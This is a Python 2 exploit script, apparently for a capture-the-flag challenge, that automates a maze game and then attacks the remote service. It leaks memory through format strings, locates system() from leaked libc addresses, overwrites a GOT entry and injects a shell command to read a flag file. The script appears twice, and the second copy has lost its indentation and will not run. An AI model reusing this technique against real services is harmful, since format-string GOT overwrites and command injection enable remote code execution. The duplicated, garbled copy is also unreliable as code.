peternguyen93/wwtv

## wwtv
import socket
import time
import re
from Pwning import *

pl = Payload()

def get_socket(host, port):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host, port))

	return s


def send(s, msg):
	s.sendall(msg + "\n")
	print '[+] Send:', repr(msg)


def recv(s):
	data = s.recv(4096)
	print data

	return data

def recv_until(s, text):
	data = ''
	while text not in data:
		new_data = recv(s)
		if new_data == '':
			break
		data += new_data

		if 'TARDIS KEY:' in data:
			return data

		import time
		time.sleep(0.01)

	return data


"""
MAZE GAME
"""
g_map = None
g_found = False
g_path = None
MAP_WIDTH = 20
MAP_HEIGHT = 20

TARGET_X = 89
TARGET_Y = 28

g_best_solution = 'A' * 1000


def get_valid_moves(moved_cells, x, y):
	moves = []
	if x < MAP_WIDTH - 1 and g_map[y][x + 1] != 'A' and moved_cells[y][x + 1] == False:
		moves.append('d')
	if y < MAP_HEIGHT - 1 and g_map[y + 1][x] != 'A' and moved_cells[y + 1][x] == False:
		moves.append('s')
	if y > 0 and g_map[y - 1][x] != 'A' and moved_cells[y - 1][x] == False:
		moves.append('w')
	if x > 0 and g_map[y][x - 1] != 'A' and moved_cells[y][x - 1] == False:
		moves.append('a')

	return moves


def solve_rec(moved_cells, x, y, curr_path):
	global g_best_solution

	if g_found:
		return

	if len(curr_path) > len(g_best_solution):
		return

	if g_map[x][y] == 'E':
		g_found = True
		g_path = curr_path

	available_moves = get_valid_moves(moved_cells, x, y)

	for move in available_moves:
		if move == 'w':
			next_x = x
			next_y = y - 1
		elif move == 's':
			next_x = x
			next_y = y + 1
		elif move == 'a':
			next_x = x - 1
			next_y = y
		else:
			next_x = x + 1
			next_y = y

		curr_path += move

		moved_cells[next_y][next_x] = True
		solve_rec(moved_cells, next_x, next_y, curr_path)
		moved_cells[next_y][next_x] = False

		curr_path = curr_path[:-1] # restore


def get_person_position():
	for i in xrange(MAP_HEIGHT):
		for j in xrange(MAP_WIDTH):
			if g_map[i][j] in '^<>V':
				return (i, j)


def get_target_position():
	for i in xrange(MAP_HEIGHT):
		for j in xrange(MAP_WIDTH):
			if g_map[i][j] in 'ET':
				return (i, j)

def get_moves(r, c):
	return [(r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)]

def get_best_move(m):
	global g_map

	g_map = m

	person = get_person_position()
	target = get_target_position()
	print 'person:', person
	print 'target:', target

	best_score = 0


	best_position_score = -1000000
	best_position = (0, 0)
	for p_r, p_c in get_moves(person[0], person[1]):
		nearest_enemy = 1000
		for r in xrange(MAP_HEIGHT):
			for c in xrange(MAP_WIDTH):
				if g_map[r][c] == 'A':
					enemy_distance = abs(r - p_r) + abs(c - p_c)
					if enemy_distance < nearest_enemy:
						nearest_enemy = enemy_distance

		target_distance = abs(target[0] - p_r) + abs(target[1] - p_c)
		position_score = nearest_enemy - target_distance * 100
		print (p_r, p_c), nearest_enemy, target_distance, position_score
		if position_score > best_position_score and nearest_enemy != 0:
			best_position_score = position_score
			best_position = (p_r, p_c)

	if best_position_score == -1000000:
		return None

	if best_position[0] < person[0]:
		return 'w'
	if best_position[0] > person[0]:
		return 's'
	if best_position[1] < person[1]:
		return 'a'
	return 'd'


def solve(m):
	global g_map

	g_map = m

	moved_cells = []

	for i in xrange(MAP_HEIGHT):
		moved_cells.append([])
		for j in xrange(MAP_WIDTH):
			moved_cells[i].append(False)

	person_position = get_person_position()
	solve_rec(moved_cells, person_position[0], person_position[1], '')

	return g_path
"""
MAZE GAME
"""


def read_map(raw):
	m = [0] * 20

	for i in xrange(20):
		row = raw[i][3:]
		m[i] = [c for c in row]

	return m


def xor_string(a, b):
	if len(a) > len(b):
		a, b = b, a

	ret = ''
	for i in xrange(len(a)):
		ret += chr( ord(a[i]) ^ ord(b[i]) )

	return ret


def get_key():
	import string
	func = '5589E55383EC24E8DCFBFFFF81C33C410000C745F00A0000008D8306E0FFFF890424E8A1F9FFFF8B83F0FFFFFF8B00890424E8A1F9FFFF8D83B8BEFFFF8945F4EB5E8B45F40FB6000FBEC083E07F890424E832FAFFFF85C07442C7442408010000008D45EE89442404C7042400000000E843F9FFFF83F801751E0FB645EE0FBED08B45F40FB6000FBEC083E07F39C27407B801000000EB28836DF0018345F401837DF000759C90E83CF9FFFF8845EF807DEF0A7406807DEFFF75ECB80000000083C4245B5DC35589E55383EC24E816FBFFFF81C3764000008B45148845E4C745F000000000EB66C7442408010000008D45EF894424048B4508890424E8B7F8FFFF8945F4837DF4007F07B8FFFFFFFFEB58837DF4007507B8FFFFFFFFEB4B0FB645EF3A45E475108B55F08B450C01D0C600008B45F0EB328B45F08D50018955F089C28B450C01C20FB645EF88028B45F03B45107C928B45F08D50FF8B450C01D0C600008B45F083E80183C4245B5DC355'.decode('hex')

	key = ''
	for c in func:
		if chr(ord(c) & 0x7f) in 'abcdefghijklmnopqrstuvwxyz' + 'abcdefghijklmnopqrstuvwxyz'.upper() + '0123456789':
			key += chr(ord(c) & 0x7f)

		if len(key) == 10:
			break

	return key


def _solve():
	key = get_key()

	while True:
		s = get_socket('wwtw_c3722e23150e1d5abbc1c248d99d718d.quals.shallweplayaga.me', 2606)

		success = True
		while True:
			data = recv_until(s, 'Your move (w,a,s,d,q): ')
			if 'TARDIS KEY:' in data:
				break

			raw_map = data.split('Your move (w,a,s,d,q):')[0].split('\n')[-21:-1]
			try:
				game_map = read_map(raw_map)
			except:
				success = False
				break

			best_move = get_best_move(game_map)
			if best_move is None:
				success = False
				break

			send(s, best_move)

		if success:
			send(s, key)
			recv(s)
			send(s,'\x00'*9)
			recv(s)
			time.sleep(2)
			send(s,pl.p(0x55592B6C + 1))
			recv(s)
			send(s,'\x00'*9)
			print repr(recv(s))
			send(s,pl.p(0x55592B6C + 1))
			time.sleep(1)
			send(s,'1\n')
			recv_until(s, 'The TARDIS console is online!')
			recv_until(s, 'Selection:')
			send(s,'3\n')
			recv_until(s, 'Coordinates: ')
			send(s,'51.492137,-0.192878 {}\n'.format('%275$p'))
			data = recv_until(s, 'would rip a hole in time and space. Choose again.')
			match = re.findall(r'.+ (0x[0-9a-f]*) .+',data)
			base_bin = int(match[0],16) - 0x1491
			read = base_bin + 0x5010
			atof_got = base_bin + 0x5080
			print 'Base Bin :',hex(base_bin)

			recv_until(s, 'Coordinates: ')
			send(s,'51.492137,-0.192878 {}\n'.format(pl.p(read) + '%20$s'))
			data = recv_until(s, 'would rip a hole in time and space. Choose again.')
			print repr(data)
			data = data[52:]
			read = pl.up(data[4:8])
			printf = pl.up(data[8:12])
			print 'read() : ',hex(read)
			print 'printf() : ',hex(printf)
			system = read - 0x9aa40
			print 'system() : ',hex(system)

			recv_until(s, 'Coordinates: ')
			send(s,pl.build32FormatStringBug(atof_got,system,20,'51.492137,-0.192878 '))

			recv_until(s, 'Coordinates: ')
			send(s,',,,,,,;cat /home/wwtw/flag;,,,,,,,,\n')

			tn = telnetlib.Telnet()
			tn.sock = s
			tn.interact()
			break

_solve()
	import socket
	import time
	import re
	from Pwning import *

	pl = Payload()

	def get_socket(host, port):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host, port))

	return s


	def send(s, msg):
	s.sendall(msg + "\n")
	print '[+] Send:', repr(msg)


	def recv(s):
	data = s.recv(4096)
	print data

	return data

	def recv_until(s, text):
	data = ''
	while text not in data:
	new_data = recv(s)
	if new_data == '':
	break
	data += new_data

	if 'TARDIS KEY:' in data:
	return data

	import time
	time.sleep(0.01)

	return data



	"""
	MAZE GAME
	"""
	g_map = None
	g_found = False
	g_path = None
	MAP_WIDTH = 20
	MAP_HEIGHT = 20

	TARGET_X = 89
	TARGET_Y = 28

	g_best_solution = 'A' * 1000


	def get_valid_moves(moved_cells, x, y):
	moves = []
	if x < MAP_WIDTH - 1 and g_map[y][x + 1] != 'A' and moved_cells[y][x + 1] == False:
	moves.append('d')
	if y < MAP_HEIGHT - 1 and g_map[y + 1][x] != 'A' and moved_cells[y + 1][x] == False:
	moves.append('s')
	if y > 0 and g_map[y - 1][x] != 'A' and moved_cells[y - 1][x] == False:
	moves.append('w')
	if x > 0 and g_map[y][x - 1] != 'A' and moved_cells[y][x - 1] == False:
	moves.append('a')

	return moves


	def solve_rec(moved_cells, x, y, curr_path):
	global g_best_solution

	if g_found:
	return

	if len(curr_path) > len(g_best_solution):
	return

	if g_map[x][y] == 'E':
	g_found = True
	g_path = curr_path

	available_moves = get_valid_moves(moved_cells, x, y)

	for move in available_moves:
	if move == 'w':
	next_x = x
	next_y = y - 1
	elif move == 's':
	next_x = x
	next_y = y + 1
	elif move == 'a':
	next_x = x - 1
	next_y = y
	else:
	next_x = x + 1
	next_y = y

	curr_path += move

	moved_cells[next_y][next_x] = True
	solve_rec(moved_cells, next_x, next_y, curr_path)
	moved_cells[next_y][next_x] = False

	curr_path = curr_path[:-1] # restore



	def get_person_position():
	for i in xrange(MAP_HEIGHT):
	for j in xrange(MAP_WIDTH):
	if g_map[i][j] in '^<>V':
	return (i, j)


	def get_target_position():
	for i in xrange(MAP_HEIGHT):
	for j in xrange(MAP_WIDTH):
	if g_map[i][j] in 'ET':
	return (i, j)

	def get_moves(r, c):
	return [(r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)]

	def get_best_move(m):
	global g_map

	g_map = m

	person = get_person_position()
	target = get_target_position()
	print 'person:', person
	print 'target:', target

	best_score = 0


	best_position_score = -1000000
	best_position = (0, 0)
	for p_r, p_c in get_moves(person[0], person[1]):
	nearest_enemy = 1000
	for r in xrange(MAP_HEIGHT):
	for c in xrange(MAP_WIDTH):
	if g_map[r][c] == 'A':
	enemy_distance = abs(r - p_r) + abs(c - p_c)
	if enemy_distance < nearest_enemy:
	nearest_enemy = enemy_distance

	target_distance = abs(target[0] - p_r) + abs(target[1] - p_c)
	position_score = nearest_enemy - target_distance * 100
	print (p_r, p_c), nearest_enemy, target_distance, position_score
	if position_score > best_position_score and nearest_enemy != 0:
	best_position_score = position_score
	best_position = (p_r, p_c)

	if best_position_score == -1000000:
	return None

	if best_position[0] < person[0]:
	return 'w'
	if best_position[0] > person[0]:
	return 's'
	if best_position[1] < person[1]:
	return 'a'
	return 'd'


	def solve(m):
	global g_map

	g_map = m

	moved_cells = []

	for i in xrange(MAP_HEIGHT):
	moved_cells.append([])
	for j in xrange(MAP_WIDTH):
	moved_cells[i].append(False)

	person_position = get_person_position()
	solve_rec(moved_cells, person_position[0], person_position[1], '')

	return g_path
	"""
	MAZE GAME
	"""


	def read_map(raw):
	m = [0] * 20

	for i in xrange(20):
	row = raw[i][3:]
	m[i] = [c for c in row]

	return m



	def xor_string(a, b):
	if len(a) > len(b):
	a, b = b, a

	ret = ''
	for i in xrange(len(a)):
	ret += chr( ord(a[i]) ^ ord(b[i]) )

	return ret


	def get_key():
	import string
	func = '5589E55383EC24E8DCFBFFFF81C33C410000C745F00A0000008D8306E0FFFF890424E8A1F9FFFF8B83F0FFFFFF8B00890424E8A1F9FFFF8D83B8BEFFFF8945F4EB5E8B45F40FB6000FBEC083E07F890424E832FAFFFF85C07442C7442408010000008D45EE89442404C7042400000000E843F9FFFF83F801751E0FB645EE0FBED08B45F40FB6000FBEC083E07F39C27407B801000000EB28836DF0018345F401837DF000759C90E83CF9FFFF8845EF807DEF0A7406807DEFFF75ECB80000000083C4245B5DC35589E55383EC24E816FBFFFF81C3764000008B45148845E4C745F000000000EB66C7442408010000008D45EF894424048B4508890424E8B7F8FFFF8945F4837DF4007F07B8FFFFFFFFEB58837DF4007507B8FFFFFFFFEB4B0FB645EF3A45E475108B55F08B450C01D0C600008B45F0EB328B45F08D50018955F089C28B450C01C20FB645EF88028B45F03B45107C928B45F08D50FF8B450C01D0C600008B45F083E80183C4245B5DC355'.decode('hex')

	key = ''
	for c in func:
	if chr(ord(c) & 0x7f) in 'abcdefghijklmnopqrstuvwxyz' + 'abcdefghijklmnopqrstuvwxyz'.upper() + '0123456789':
	key += chr(ord(c) & 0x7f)

	if len(key) == 10:
	break

	return key


	def _solve():
	key = get_key()

	while True:
	s = get_socket('wwtw_c3722e23150e1d5abbc1c248d99d718d.quals.shallweplayaga.me', 2606)

	success = True
	while True:
	data = recv_until(s, 'Your move (w,a,s,d,q): ')
	if 'TARDIS KEY:' in data:
	break

	raw_map = data.split('Your move (w,a,s,d,q):')[0].split('\n')[-21:-1]
	try:
	game_map = read_map(raw_map)
	except:
	success = False
	break

	best_move = get_best_move(game_map)
	if best_move is None:
	success = False
	break

	send(s, best_move)

	if success:
	send(s, key)
	recv(s)
	send(s,'\x00'*9)
	recv(s)
	time.sleep(2)
	send(s,pl.p(0x55592B6C + 1))
	recv(s)
	send(s,'\x00'*9)
	print repr(recv(s))
	send(s,pl.p(0x55592B6C + 1))
	time.sleep(1)
	send(s,'1\n')
	recv_until(s, 'The TARDIS console is online!')
	recv_until(s, 'Selection:')
	send(s,'3\n')
	recv_until(s, 'Coordinates: ')
	send(s,'51.492137,-0.192878 {}\n'.format('%275$p'))
	data = recv_until(s, 'would rip a hole in time and space. Choose again.')
	match = re.findall(r'.+ (0x[0-9a-f]*) .+',data)
	base_bin = int(match[0],16) - 0x1491
	read = base_bin + 0x5010
	atof_got = base_bin + 0x5080
	print 'Base Bin :',hex(base_bin)

	recv_until(s, 'Coordinates: ')
	send(s,'51.492137,-0.192878 {}\n'.format(pl.p(read) + '%20$s'))
	data = recv_until(s, 'would rip a hole in time and space. Choose again.')
	print repr(data)
	data = data[52:]
	read = pl.up(data[4:8])
	printf = pl.up(data[8:12])
	print 'read() : ',hex(read)
	print 'printf() : ',hex(printf)
	system = read - 0x9aa40
	print 'system() : ',hex(system)

	recv_until(s, 'Coordinates: ')
	send(s,pl.build32FormatStringBug(atof_got,system,20,'51.492137,-0.192878 '))

	recv_until(s, 'Coordinates: ')
	send(s,',,,,,,;cat /home/wwtw/flag;,,,,,,,,\n')

	tn = telnetlib.Telnet()
	tn.sock = s
	tn.interact()
	break

	_solve()